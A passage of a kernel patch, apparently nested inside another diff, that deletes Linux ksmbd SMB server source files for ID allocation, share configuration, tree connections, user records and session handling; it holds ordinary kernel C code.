+-	bool                            multiRsp:1;
+-	/* No response for cancelled request */
+-	bool                            send_no_response:1;
+-	/* Request is encrypted */
+-	bool                            encrypted:1;
+-	/* Is this SYNC or ASYNC ksmbd_work */
+-	bool                            syncronous:1;
+-	bool                            need_invalidate_rkey:1;
+-
+-	unsigned int                    remote_key;
+-	/* cancel works */
+-	int                             async_id;
+-	void                            **cancel_argv;
+-	void                            (*cancel_fn)(void **argv);
+-
+-	struct work_struct              work;
+-	/* List head at conn->requests */
+-	struct list_head                request_entry;
+-	/* List head at conn->async_requests */
+-	struct list_head                async_request_entry;
+-	struct list_head                fp_entry;
+-	struct list_head                interim_entry;
+-};
+-
+-/**
+- * ksmbd_resp_buf_next - Get next buffer on compound response.
+- * @work: smb work containing response buffer
+- */
+-static inline void *ksmbd_resp_buf_next(struct ksmbd_work *work)
+-{
+-	return work->response_buf + work->next_smb2_rsp_hdr_off + 4;
+-}
+-
+-/**
+- * ksmbd_req_buf_next - Get next buffer on compound request.
+- * @work: smb work containing response buffer
+- */
+-static inline void *ksmbd_req_buf_next(struct ksmbd_work *work)
+-{
+-	return work->request_buf + work->next_smb2_rcv_hdr_off + 4;
+-}
+-
+-struct ksmbd_work *ksmbd_alloc_work_struct(void);
+-void ksmbd_free_work_struct(struct ksmbd_work *work);
+-
+-void ksmbd_work_pool_destroy(void);
+-int ksmbd_work_pool_init(void);
+-
+-int ksmbd_workqueue_init(void);
+-void ksmbd_workqueue_destroy(void);
+-bool ksmbd_queue_work(struct ksmbd_work *work);
+-
+-#endif /* __KSMBD_WORK_H__ */
+diff --git a/fs/ksmbd/mgmt/ksmbd_ida.c b/fs/ksmbd/mgmt/ksmbd_ida.c
+deleted file mode 100644
+index 54194d959a5ef..0000000000000
+--- a/fs/ksmbd/mgmt/ksmbd_ida.c
++++ /dev/null
+@@ -1,46 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include "ksmbd_ida.h"
+-
+-static inline int __acquire_id(struct ida *ida, int from, int to)
+-{
+-	return ida_simple_get(ida, from, to, GFP_KERNEL);
+-}
+-
+-int ksmbd_acquire_smb2_tid(struct ida *ida)
+-{
+-	int id;
+-
+-	id = __acquire_id(ida, 1, 0xFFFFFFFF);
+-
+-	return id;
+-}
+-
+-int ksmbd_acquire_smb2_uid(struct ida *ida)
+-{
+-	int id;
+-
+-	id = __acquire_id(ida, 1, 0);
+-	if (id == 0xFFFE)
+-		id = __acquire_id(ida, 1, 0);
+-
+-	return id;
+-}
+-
+-int ksmbd_acquire_async_msg_id(struct ida *ida)
+-{
+-	return __acquire_id(ida, 1, 0);
+-}
+-
+-int ksmbd_acquire_id(struct ida *ida)
+-{
+-	return __acquire_id(ida, 0, 0);
+-}
+-
+-void ksmbd_release_id(struct ida *ida, int id)
+-{
+-	ida_simple_remove(ida, id);
+-}
+diff --git a/fs/ksmbd/mgmt/ksmbd_ida.h b/fs/ksmbd/mgmt/ksmbd_ida.h
+deleted file mode 100644
+index 2bc07b16cfde9..0000000000000
+--- a/fs/ksmbd/mgmt/ksmbd_ida.h
++++ /dev/null
+@@ -1,34 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_IDA_MANAGEMENT_H__
+-#define __KSMBD_IDA_MANAGEMENT_H__
+-
+-#include <linux/slab.h>
+-#include <linux/idr.h>
+-
+-/*
+- * 2.2.1.6.7 TID Generation
+- *    The value 0xFFFF MUST NOT be used as a valid TID. All other
+- *    possible values for TID, including zero (0x0000), are valid.
+- *    The value 0xFFFF is used to specify all TIDs or no TID,
+- *    depending upon the context in which it is used.
+- */
+-int ksmbd_acquire_smb2_tid(struct ida *ida);
+-
+-/*
+- * 2.2.1.6.8 UID Generation
+- *    The value 0xFFFE was declared reserved in the LAN Manager 1.0
+- *    documentation, so a value of 0xFFFE SHOULD NOT be used as a
+- *    valid UID.<21> All other possible values for a UID, excluding
+- *    zero (0x0000), are valid.
+- */
+-int ksmbd_acquire_smb2_uid(struct ida *ida);
+-int ksmbd_acquire_async_msg_id(struct ida *ida);
+-
+-int ksmbd_acquire_id(struct ida *ida);
+-
+-void ksmbd_release_id(struct ida *ida, int id);
+-#endif /* __KSMBD_IDA_MANAGEMENT_H__ */
+diff --git a/fs/ksmbd/mgmt/share_config.c b/fs/ksmbd/mgmt/share_config.c
+deleted file mode 100644
+index 328a412259dc1..0000000000000
+--- a/fs/ksmbd/mgmt/share_config.c
++++ /dev/null
+@@ -1,234 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/list.h>
+-#include <linux/jhash.h>
+-#include <linux/slab.h>
+-#include <linux/rwsem.h>
+-#include <linux/parser.h>
+-#include <linux/namei.h>
+-#include <linux/sched.h>
+-#include <linux/mm.h>
+-
+-#include "share_config.h"
+-#include "user_config.h"
+-#include "user_session.h"
+-#include "../transport_ipc.h"
+-#include "../misc.h"
+-
+-#define SHARE_HASH_BITS		3
+-static DEFINE_HASHTABLE(shares_table, SHARE_HASH_BITS);
+-static DECLARE_RWSEM(shares_table_lock);
+-
+-struct ksmbd_veto_pattern {
+-	char			*pattern;
+-	struct list_head	list;
+-};
+-
+-static unsigned int share_name_hash(const char *name)
+-{
+-	return jhash(name, strlen(name), 0);
+-}
+-
+-static void kill_share(struct ksmbd_share_config *share)
+-{
+-	while (!list_empty(&share->veto_list)) {
+-		struct ksmbd_veto_pattern *p;
+-
+-		p = list_entry(share->veto_list.next,
+-			       struct ksmbd_veto_pattern,
+-			       list);
+-		list_del(&p->list);
+-		kfree(p->pattern);
+-		kfree(p);
+-	}
+-
+-	if (share->path)
+-		path_put(&share->vfs_path);
+-	kfree(share->name);
+-	kfree(share->path);
+-	kfree(share);
+-}
+-
+-void ksmbd_share_config_del(struct ksmbd_share_config *share)
+-{
+-	down_write(&shares_table_lock);
+-	hash_del(&share->hlist);
+-	up_write(&shares_table_lock);
+-}
+-
+-void __ksmbd_share_config_put(struct ksmbd_share_config *share)
+-{
+-	ksmbd_share_config_del(share);
+-	kill_share(share);
+-}
+-
+-static struct ksmbd_share_config *
+-__get_share_config(struct ksmbd_share_config *share)
+-{
+-	if (!atomic_inc_not_zero(&share->refcount))
+-		return NULL;
+-	return share;
+-}
+-
+-static struct ksmbd_share_config *__share_lookup(const char *name)
+-{
+-	struct ksmbd_share_config *share;
+-	unsigned int key = share_name_hash(name);
+-
+-	hash_for_each_possible(shares_table, share, hlist, key) {
+-		if (!strcmp(name, share->name))
+-			return share;
+-	}
+-	return NULL;
+-}
+-
+-static int parse_veto_list(struct ksmbd_share_config *share,
+-			   char *veto_list,
+-			   int veto_list_sz)
+-{
+-	int sz = 0;
+-
+-	if (!veto_list_sz)
+-		return 0;
+-
+-	while (veto_list_sz > 0) {
+-		struct ksmbd_veto_pattern *p;
+-
+-		sz = strlen(veto_list);
+-		if (!sz)
+-			break;
+-
+-		p = kzalloc(sizeof(struct ksmbd_veto_pattern), GFP_KERNEL);
+-		if (!p)
+-			return -ENOMEM;
+-
+-		p->pattern = kstrdup(veto_list, GFP_KERNEL);
+-		if (!p->pattern) {
+-			kfree(p);
+-			return -ENOMEM;
+-		}
+-
+-		list_add(&p->list, &share->veto_list);
+-
+-		veto_list += sz + 1;
+-		veto_list_sz -= (sz + 1);
+-	}
+-
+-	return 0;
+-}
+-
+-static struct ksmbd_share_config *share_config_request(struct unicode_map *um,
+-						       const char *name)
+-{
+-	struct ksmbd_share_config_response *resp;
+-	struct ksmbd_share_config *share = NULL;
+-	struct ksmbd_share_config *lookup;
+-	int ret;
+-
+-	resp = ksmbd_ipc_share_config_request(name);
+-	if (!resp)
+-		return NULL;
+-
+-	if (resp->flags == KSMBD_SHARE_FLAG_INVALID)
+-		goto out;
+-
+-	if (*resp->share_name) {
+-		char *cf_resp_name;
+-		bool equal;
+-
+-		cf_resp_name = ksmbd_casefold_sharename(um, resp->share_name);
+-		if (IS_ERR(cf_resp_name))
+-			goto out;
+-		equal = !strcmp(cf_resp_name, name);
+-		kfree(cf_resp_name);
+-		if (!equal)
+-			goto out;
+-	}
+-
+-	share = kzalloc(sizeof(struct ksmbd_share_config), GFP_KERNEL);
+-	if (!share)
+-		goto out;
+-
+-	share->flags = resp->flags;
+-	atomic_set(&share->refcount, 1);
+-	INIT_LIST_HEAD(&share->veto_list);
+-	share->name = kstrdup(name, GFP_KERNEL);
+-
+-	if (!test_share_config_flag(share, KSMBD_SHARE_FLAG_PIPE)) {
+-		share->path = kstrdup(ksmbd_share_config_path(resp),
+-				      GFP_KERNEL);
+-		if (share->path)
+-			share->path_sz = strlen(share->path);
+-		share->create_mask = resp->create_mask;
+-		share->directory_mask = resp->directory_mask;
+-		share->force_create_mode = resp->force_create_mode;
+-		share->force_directory_mode = resp->force_directory_mode;
+-		share->force_uid = resp->force_uid;
+-		share->force_gid = resp->force_gid;
+-		ret = parse_veto_list(share,
+-				      KSMBD_SHARE_CONFIG_VETO_LIST(resp),
+-				      resp->veto_list_sz);
+-		if (!ret && share->path) {
+-			ret = kern_path(share->path, 0, &share->vfs_path);
+-			if (ret) {
+-				ksmbd_debug(SMB, "failed to access '%s'\n",
+-					    share->path);
+-				/* Avoid put_path() */
+-				kfree(share->path);
+-				share->path = NULL;
+-			}
+-		}
+-		if (ret || !share->name) {
+-			kill_share(share);
+-			share = NULL;
+-			goto out;
+-		}
+-	}
+-
+-	down_write(&shares_table_lock);
+-	lookup = __share_lookup(name);
+-	if (lookup)
+-		lookup = __get_share_config(lookup);
+-	if (!lookup) {
+-		hash_add(shares_table, &share->hlist, share_name_hash(name));
+-	} else {
+-		kill_share(share);
+-		share = lookup;
+-	}
+-	up_write(&shares_table_lock);
+-
+-out:
+-	kvfree(resp);
+-	return share;
+-}
+-
+-struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
+-						  const char *name)
+-{
+-	struct ksmbd_share_config *share;
+-
+-	down_read(&shares_table_lock);
+-	share = __share_lookup(name);
+-	if (share)
+-		share = __get_share_config(share);
+-	up_read(&shares_table_lock);
+-
+-	if (share)
+-		return share;
+-	return share_config_request(um, name);
+-}
+-
+-bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
+-			       const char *filename)
+-{
+-	struct ksmbd_veto_pattern *p;
+-
+-	list_for_each_entry(p, &share->veto_list, list) {
+-		if (match_wildcard(p->pattern, filename))
+-			return true;
+-	}
+-	return false;
+-}
+diff --git a/fs/ksmbd/mgmt/share_config.h b/fs/ksmbd/mgmt/share_config.h
+deleted file mode 100644
+index 3fd3382939421..0000000000000
+--- a/fs/ksmbd/mgmt/share_config.h
++++ /dev/null
+@@ -1,82 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __SHARE_CONFIG_MANAGEMENT_H__
+-#define __SHARE_CONFIG_MANAGEMENT_H__
+-
+-#include <linux/workqueue.h>
+-#include <linux/hashtable.h>
+-#include <linux/path.h>
+-#include <linux/unicode.h>
+-
+-struct ksmbd_share_config {
+-	char			*name;
+-	char			*path;
+-
+-	unsigned int		path_sz;
+-	unsigned int		flags;
+-	struct list_head	veto_list;
+-
+-	struct path		vfs_path;
+-
+-	atomic_t		refcount;
+-	struct hlist_node	hlist;
+-	unsigned short		create_mask;
+-	unsigned short		directory_mask;
+-	unsigned short		force_create_mode;
+-	unsigned short		force_directory_mode;
+-	unsigned short		force_uid;
+-	unsigned short		force_gid;
+-};
+-
+-#define KSMBD_SHARE_INVALID_UID	((__u16)-1)
+-#define KSMBD_SHARE_INVALID_GID	((__u16)-1)
+-
+-static inline int share_config_create_mode(struct ksmbd_share_config *share,
+-					   umode_t posix_mode)
+-{
+-	if (!share->force_create_mode) {
+-		if (!posix_mode)
+-			return share->create_mask;
+-		else
+-			return posix_mode & share->create_mask;
+-	}
+-	return share->force_create_mode & share->create_mask;
+-}
+-
+-static inline int share_config_directory_mode(struct ksmbd_share_config *share,
+-					      umode_t posix_mode)
+-{
+-	if (!share->force_directory_mode) {
+-		if (!posix_mode)
+-			return share->directory_mask;
+-		else
+-			return posix_mode & share->directory_mask;
+-	}
+-
+-	return share->force_directory_mode & share->directory_mask;
+-}
+-
+-static inline int test_share_config_flag(struct ksmbd_share_config *share,
+-					 int flag)
+-{
+-	return share->flags & flag;
+-}
+-
+-void ksmbd_share_config_del(struct ksmbd_share_config *share);
+-void __ksmbd_share_config_put(struct ksmbd_share_config *share);
+-
+-static inline void ksmbd_share_config_put(struct ksmbd_share_config *share)
+-{
+-	if (!atomic_dec_and_test(&share->refcount))
+-		return;
+-	__ksmbd_share_config_put(share);
+-}
+-
+-struct ksmbd_share_config *ksmbd_share_config_get(struct unicode_map *um,
+-						  const char *name);
+-bool ksmbd_share_veto_filename(struct ksmbd_share_config *share,
+-			       const char *filename);
+-#endif /* __SHARE_CONFIG_MANAGEMENT_H__ */
+diff --git a/fs/ksmbd/mgmt/tree_connect.c b/fs/ksmbd/mgmt/tree_connect.c
+deleted file mode 100644
+index f07a05f376513..0000000000000
+--- a/fs/ksmbd/mgmt/tree_connect.c
++++ /dev/null
+@@ -1,147 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/list.h>
+-#include <linux/slab.h>
+-#include <linux/xarray.h>
+-
+-#include "../transport_ipc.h"
+-#include "../connection.h"
+-
+-#include "tree_connect.h"
+-#include "user_config.h"
+-#include "share_config.h"
+-#include "user_session.h"
+-
+-struct ksmbd_tree_conn_status
+-ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			const char *share_name)
+-{
+-	struct ksmbd_tree_conn_status status = {-ENOENT, NULL};
+-	struct ksmbd_tree_connect_response *resp = NULL;
+-	struct ksmbd_share_config *sc;
+-	struct ksmbd_tree_connect *tree_conn = NULL;
+-	struct sockaddr *peer_addr;
+-	int ret;
+-
+-	sc = ksmbd_share_config_get(conn->um, share_name);
+-	if (!sc)
+-		return status;
+-
+-	tree_conn = kzalloc(sizeof(struct ksmbd_tree_connect), GFP_KERNEL);
+-	if (!tree_conn) {
+-		status.ret = -ENOMEM;
+-		goto out_error;
+-	}
+-
+-	tree_conn->id = ksmbd_acquire_tree_conn_id(sess);
+-	if (tree_conn->id < 0) {
+-		status.ret = -EINVAL;
+-		goto out_error;
+-	}
+-
+-	peer_addr = KSMBD_TCP_PEER_SOCKADDR(conn);
+-	resp = ksmbd_ipc_tree_connect_request(sess,
+-					      sc,
+-					      tree_conn,
+-					      peer_addr);
+-	if (!resp) {
+-		status.ret = -EINVAL;
+-		goto out_error;
+-	}
+-
+-	status.ret = resp->status;
+-	if (status.ret != KSMBD_TREE_CONN_STATUS_OK)
+-		goto out_error;
+-
+-	tree_conn->flags = resp->connection_flags;
+-	if (test_tree_conn_flag(tree_conn, KSMBD_TREE_CONN_FLAG_UPDATE)) {
+-		struct ksmbd_share_config *new_sc;
+-
+-		ksmbd_share_config_del(sc);
+-		new_sc = ksmbd_share_config_get(conn->um, share_name);
+-		if (!new_sc) {
+-			pr_err("Failed to update stale share config\n");
+-			status.ret = -ESTALE;
+-			goto out_error;
+-		}
+-		ksmbd_share_config_put(sc);
+-		sc = new_sc;
+-	}
+-
+-	tree_conn->user = sess->user;
+-	tree_conn->share_conf = sc;
+-	status.tree_conn = tree_conn;
+-
+-	ret = xa_err(xa_store(&sess->tree_conns, tree_conn->id, tree_conn,
+-			      GFP_KERNEL));
+-	if (ret) {
+-		status.ret = -ENOMEM;
+-		goto out_error;
+-	}
+-	kvfree(resp);
+-	return status;
+-
+-out_error:
+-	if (tree_conn)
+-		ksmbd_release_tree_conn_id(sess, tree_conn->id);
+-	ksmbd_share_config_put(sc);
+-	kfree(tree_conn);
+-	kvfree(resp);
+-	return status;
+-}
+-
+-int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+-			       struct ksmbd_tree_connect *tree_conn)
+-{
+-	int ret;
+-
+-	ret = ksmbd_ipc_tree_disconnect_request(sess->id, tree_conn->id);
+-	ksmbd_release_tree_conn_id(sess, tree_conn->id);
+-	xa_erase(&sess->tree_conns, tree_conn->id);
+-	ksmbd_share_config_put(tree_conn->share_conf);
+-	kfree(tree_conn);
+-	return ret;
+-}
+-
+-struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+-						  unsigned int id)
+-{
+-	struct ksmbd_tree_connect *tcon;
+-
+-	tcon = xa_load(&sess->tree_conns, id);
+-	if (tcon) {
+-		if (test_bit(TREE_CONN_EXPIRE, &tcon->status))
+-			tcon = NULL;
+-	}
+-
+-	return tcon;
+-}
+-
+-struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+-						 unsigned int id)
+-{
+-	struct ksmbd_tree_connect *tc;
+-
+-	tc = ksmbd_tree_conn_lookup(sess, id);
+-	if (tc)
+-		return tc->share_conf;
+-	return NULL;
+-}
+-
+-int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess)
+-{
+-	int ret = 0;
+-	struct ksmbd_tree_connect *tc;
+-	unsigned long id;
+-
+-	if (!sess)
+-		return -EINVAL;
+-
+-	xa_for_each(&sess->tree_conns, id, tc)
+-		ret |= ksmbd_tree_conn_disconnect(sess, tc);
+-	xa_destroy(&sess->tree_conns);
+-	return ret;
+-}
+diff --git a/fs/ksmbd/mgmt/tree_connect.h b/fs/ksmbd/mgmt/tree_connect.h
+deleted file mode 100644
+index 700df36cf3e30..0000000000000
+--- a/fs/ksmbd/mgmt/tree_connect.h
++++ /dev/null
+@@ -1,61 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __TREE_CONNECT_MANAGEMENT_H__
+-#define __TREE_CONNECT_MANAGEMENT_H__
+-
+-#include <linux/hashtable.h>
+-
+-#include "../ksmbd_netlink.h"
+-
+-struct ksmbd_share_config;
+-struct ksmbd_user;
+-struct ksmbd_conn;
+-
+-#define TREE_CONN_EXPIRE		1
+-
+-struct ksmbd_tree_connect {
+-	int				id;
+-
+-	unsigned int			flags;
+-	struct ksmbd_share_config	*share_conf;
+-	struct ksmbd_user		*user;
+-
+-	struct list_head		list;
+-
+-	int				maximal_access;
+-	bool				posix_extensions;
+-	unsigned long			status;
+-};
+-
+-struct ksmbd_tree_conn_status {
+-	unsigned int			ret;
+-	struct ksmbd_tree_connect	*tree_conn;
+-};
+-
+-static inline int test_tree_conn_flag(struct ksmbd_tree_connect *tree_conn,
+-				      int flag)
+-{
+-	return tree_conn->flags & flag;
+-}
+-
+-struct ksmbd_session;
+-
+-struct ksmbd_tree_conn_status
+-ksmbd_tree_conn_connect(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			const char *share_name);
+-
+-int ksmbd_tree_conn_disconnect(struct ksmbd_session *sess,
+-			       struct ksmbd_tree_connect *tree_conn);
+-
+-struct ksmbd_tree_connect *ksmbd_tree_conn_lookup(struct ksmbd_session *sess,
+-						  unsigned int id);
+-
+-struct ksmbd_share_config *ksmbd_tree_conn_share(struct ksmbd_session *sess,
+-						 unsigned int id);
+-
+-int ksmbd_tree_conn_session_logoff(struct ksmbd_session *sess);
+-
+-#endif /* __TREE_CONNECT_MANAGEMENT_H__ */
+diff --git a/fs/ksmbd/mgmt/user_config.c b/fs/ksmbd/mgmt/user_config.c
+deleted file mode 100644
+index 279d00feff216..0000000000000
+--- a/fs/ksmbd/mgmt/user_config.c
++++ /dev/null
+@@ -1,79 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/slab.h>
+-#include <linux/mm.h>
+-
+-#include "user_config.h"
+-#include "../transport_ipc.h"
+-
+-struct ksmbd_user *ksmbd_login_user(const char *account)
+-{
+-	struct ksmbd_login_response *resp;
+-	struct ksmbd_user *user = NULL;
+-
+-	resp = ksmbd_ipc_login_request(account);
+-	if (!resp)
+-		return NULL;
+-
+-	if (!(resp->status & KSMBD_USER_FLAG_OK))
+-		goto out;
+-
+-	user = ksmbd_alloc_user(resp);
+-out:
+-	kvfree(resp);
+-	return user;
+-}
+-
+-struct ksmbd_user *ksmbd_alloc_user(struct ksmbd_login_response *resp)
+-{
+-	struct ksmbd_user *user = NULL;
+-
+-	user = kmalloc(sizeof(struct ksmbd_user), GFP_KERNEL);
+-	if (!user)
+-		return NULL;
+-
+-	user->name = kstrdup(resp->account, GFP_KERNEL);
+-	user->flags = resp->status;
+-	user->gid = resp->gid;
+-	user->uid = resp->uid;
+-	user->passkey_sz = resp->hash_sz;
+-	user->passkey = kmalloc(resp->hash_sz, GFP_KERNEL);
+-	if (user->passkey)
+-		memcpy(user->passkey, resp->hash, resp->hash_sz);
+-
+-	if (!user->name || !user->passkey) {
+-		kfree(user->name);
+-		kfree(user->passkey);
+-		kfree(user);
+-		user = NULL;
+-	}
+-	return user;
+-}
+-
+-void ksmbd_free_user(struct ksmbd_user *user)
+-{
+-	ksmbd_ipc_logout_request(user->name, user->flags);
+-	kfree(user->name);
+-	kfree(user->passkey);
+-	kfree(user);
+-}
+-
+-int ksmbd_anonymous_user(struct ksmbd_user *user)
+-{
+-	if (user->name[0] == '\0')
+-		return 1;
+-	return 0;
+-}
+-
+-bool ksmbd_compare_user(struct ksmbd_user *u1, struct ksmbd_user *u2)
+-{
+-	if (strcmp(u1->name, u2->name))
+-		return false;
+-	if (memcmp(u1->passkey, u2->passkey, u1->passkey_sz))
+-		return false;
+-
+-	return true;
+-}
+diff --git a/fs/ksmbd/mgmt/user_config.h b/fs/ksmbd/mgmt/user_config.h
+deleted file mode 100644
+index 6a44109617f14..0000000000000
+--- a/fs/ksmbd/mgmt/user_config.h
++++ /dev/null
+@@ -1,68 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __USER_CONFIG_MANAGEMENT_H__
+-#define __USER_CONFIG_MANAGEMENT_H__
+-
+-#include "../glob.h"
+-
+-struct ksmbd_user {
+-	unsigned short		flags;
+-
+-	unsigned int		uid;
+-	unsigned int		gid;
+-
+-	char			*name;
+-
+-	size_t			passkey_sz;
+-	char			*passkey;
+-	unsigned int		failed_login_count;
+-};
+-
+-static inline bool user_guest(struct ksmbd_user *user)
+-{
+-	return user->flags & KSMBD_USER_FLAG_GUEST_ACCOUNT;
+-}
+-
+-static inline void set_user_flag(struct ksmbd_user *user, int flag)
+-{
+-	user->flags |= flag;
+-}
+-
+-static inline int test_user_flag(struct ksmbd_user *user, int flag)
+-{
+-	return user->flags & flag;
+-}
+-
+-static inline void set_user_guest(struct ksmbd_user *user)
+-{
+-}
+-
+-static inline char *user_passkey(struct ksmbd_user *user)
+-{
+-	return user->passkey;
+-}
+-
+-static inline char *user_name(struct ksmbd_user *user)
+-{
+-	return user->name;
+-}
+-
+-static inline unsigned int user_uid(struct ksmbd_user *user)
+-{
+-	return user->uid;
+-}
+-
+-static inline unsigned int user_gid(struct ksmbd_user *user)
+-{
+-	return user->gid;
+-}
+-
+-struct ksmbd_user *ksmbd_login_user(const char *account);
+-struct ksmbd_user *ksmbd_alloc_user(struct ksmbd_login_response *resp);
+-void ksmbd_free_user(struct ksmbd_user *user);
+-int ksmbd_anonymous_user(struct ksmbd_user *user);
+-bool ksmbd_compare_user(struct ksmbd_user *u1, struct ksmbd_user *u2);
+-#endif /* __USER_CONFIG_MANAGEMENT_H__ */
+diff --git a/fs/ksmbd/mgmt/user_session.c b/fs/ksmbd/mgmt/user_session.c
+deleted file mode 100644
+index ea4b56d570fbb..0000000000000
+--- a/fs/ksmbd/mgmt/user_session.c
++++ /dev/null
+@@ -1,400 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/list.h>
+-#include <linux/slab.h>
+-#include <linux/rwsem.h>
+-#include <linux/xarray.h>
+-
+-#include "ksmbd_ida.h"
+-#include "user_session.h"
+-#include "user_config.h"
+-#include "tree_connect.h"
+-#include "../transport_ipc.h"
+-#include "../connection.h"
+-#include "../vfs_cache.h"
+-
+-static DEFINE_IDA(session_ida);
+-
+-#define SESSION_HASH_BITS		3
+-static DEFINE_HASHTABLE(sessions_table, SESSION_HASH_BITS);
+-static DECLARE_RWSEM(sessions_table_lock);
+-
+-struct ksmbd_session_rpc {
+-	int			id;
+-	unsigned int		method;
+-	struct list_head	list;
+-};
+-
+-static void free_channel_list(struct ksmbd_session *sess)
+-{
+-	struct channel *chann;
+-	unsigned long index;
+-
+-	xa_for_each(&sess->ksmbd_chann_list, index, chann) {
+-		xa_erase(&sess->ksmbd_chann_list, index);
+-		kfree(chann);
+-	}
+-
+-	xa_destroy(&sess->ksmbd_chann_list);
+-}
+-
+-static void __session_rpc_close(struct ksmbd_session *sess,
+-				struct ksmbd_session_rpc *entry)
+-{
+-	struct ksmbd_rpc_command *resp;
+-
+-	resp = ksmbd_rpc_close(sess, entry->id);
+-	if (!resp)
+-		pr_err("Unable to close RPC pipe %d\n", entry->id);
+-
+-	kvfree(resp);
+-	ksmbd_rpc_id_free(entry->id);
+-	kfree(entry);
+-}
+-
+-static void ksmbd_session_rpc_clear_list(struct ksmbd_session *sess)
+-{
+-	struct ksmbd_session_rpc *entry;
+-
+-	while (!list_empty(&sess->rpc_handle_list)) {
+-		entry = list_entry(sess->rpc_handle_list.next,
+-				   struct ksmbd_session_rpc,
+-				   list);
+-
+-		list_del(&entry->list);
+-		__session_rpc_close(sess, entry);
+-	}
+-}
+-
+-static int __rpc_method(char *rpc_name)
+-{
+-	if (!strcmp(rpc_name, "\\srvsvc") || !strcmp(rpc_name, "srvsvc"))
+-		return KSMBD_RPC_SRVSVC_METHOD_INVOKE;
+-
+-	if (!strcmp(rpc_name, "\\wkssvc") || !strcmp(rpc_name, "wkssvc"))
+-		return KSMBD_RPC_WKSSVC_METHOD_INVOKE;
+-
+-	if (!strcmp(rpc_name, "LANMAN") || !strcmp(rpc_name, "lanman"))
+-		return KSMBD_RPC_RAP_METHOD;
+-
+-	if (!strcmp(rpc_name, "\\samr") || !strcmp(rpc_name, "samr"))
+-		return KSMBD_RPC_SAMR_METHOD_INVOKE;
+-
+-	if (!strcmp(rpc_name, "\\lsarpc") || !strcmp(rpc_name, "lsarpc"))
+-		return KSMBD_RPC_LSARPC_METHOD_INVOKE;
+-
+-	pr_err("Unsupported RPC: %s\n", rpc_name);
+-	return 0;
+-}
+-
+-int ksmbd_session_rpc_open(struct ksmbd_session *sess, char *rpc_name)
+-{
+-	struct ksmbd_session_rpc *entry;
+-	struct ksmbd_rpc_command *resp;
+-	int method;
+-
+-	method = __rpc_method(rpc_name);
+-	if (!method)
+-		return -EINVAL;
+-
+-	entry = kzalloc(sizeof(struct ksmbd_session_rpc), GFP_KERNEL);
+-	if (!entry)
+-		return -EINVAL;
+-
+-	list_add(&entry->list, &sess->rpc_handle_list);
+-	entry->method = method;
+-	entry->id = ksmbd_ipc_id_alloc();
+-	if (entry->id < 0)
+-		goto free_entry;
+-
+-	resp = ksmbd_rpc_open(sess, entry->id);
+-	if (!resp)
+-		goto free_id;
+-
+-	kvfree(resp);
+-	return entry->id;
+-free_id:
+-	ksmbd_rpc_id_free(entry->id);
+-free_entry:
+-	list_del(&entry->list);
+-	kfree(entry);
+-	return -EINVAL;
+-}
+-
+-void ksmbd_session_rpc_close(struct ksmbd_session *sess, int id)
+-{
+-	struct ksmbd_session_rpc *entry;
+-
+-	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
+-		if (entry->id == id) {
+-			list_del(&entry->list);
+-			__session_rpc_close(sess, entry);
+-			break;
+-		}
+-	}
+-}
+-
+-int ksmbd_session_rpc_method(struct ksmbd_session *sess, int id)
+-{
+-	struct ksmbd_session_rpc *entry;
+-
+-	list_for_each_entry(entry, &sess->rpc_handle_list, list) {
+-		if (entry->id == id)
+-			return entry->method;
+-	}
+-	return 0;
+-}
+-
+-void ksmbd_session_destroy(struct ksmbd_session *sess)
+-{
+-	if (!sess)
+-		return;
+-
+-	if (sess->user)
+-		ksmbd_free_user(sess->user);
+-
+-	ksmbd_tree_conn_session_logoff(sess);
+-	ksmbd_destroy_file_table(&sess->file_table);
+-	ksmbd_session_rpc_clear_list(sess);
+-	free_channel_list(sess);
+-	kfree(sess->Preauth_HashValue);
+-	ksmbd_release_id(&session_ida, sess->id);
+-	kfree(sess);
+-}
+-
+-static struct ksmbd_session *__session_lookup(unsigned long long id)
+-{
+-	struct ksmbd_session *sess;
+-
+-	hash_for_each_possible(sessions_table, sess, hlist, id) {
+-		if (id == sess->id) {
+-			sess->last_active = jiffies;
+-			return sess;
+-		}
+-	}
+-	return NULL;
+-}
+-
+-static void ksmbd_expire_session(struct ksmbd_conn *conn)
+-{
+-	unsigned long id;
+-	struct ksmbd_session *sess;
+-
+-	down_write(&sessions_table_lock);
+-	xa_for_each(&conn->sessions, id, sess) {
+-		if (sess->state != SMB2_SESSION_VALID ||
+-		    time_after(jiffies,
+-			       sess->last_active + SMB2_SESSION_TIMEOUT)) {
+-			xa_erase(&conn->sessions, sess->id);
+-			hash_del(&sess->hlist);
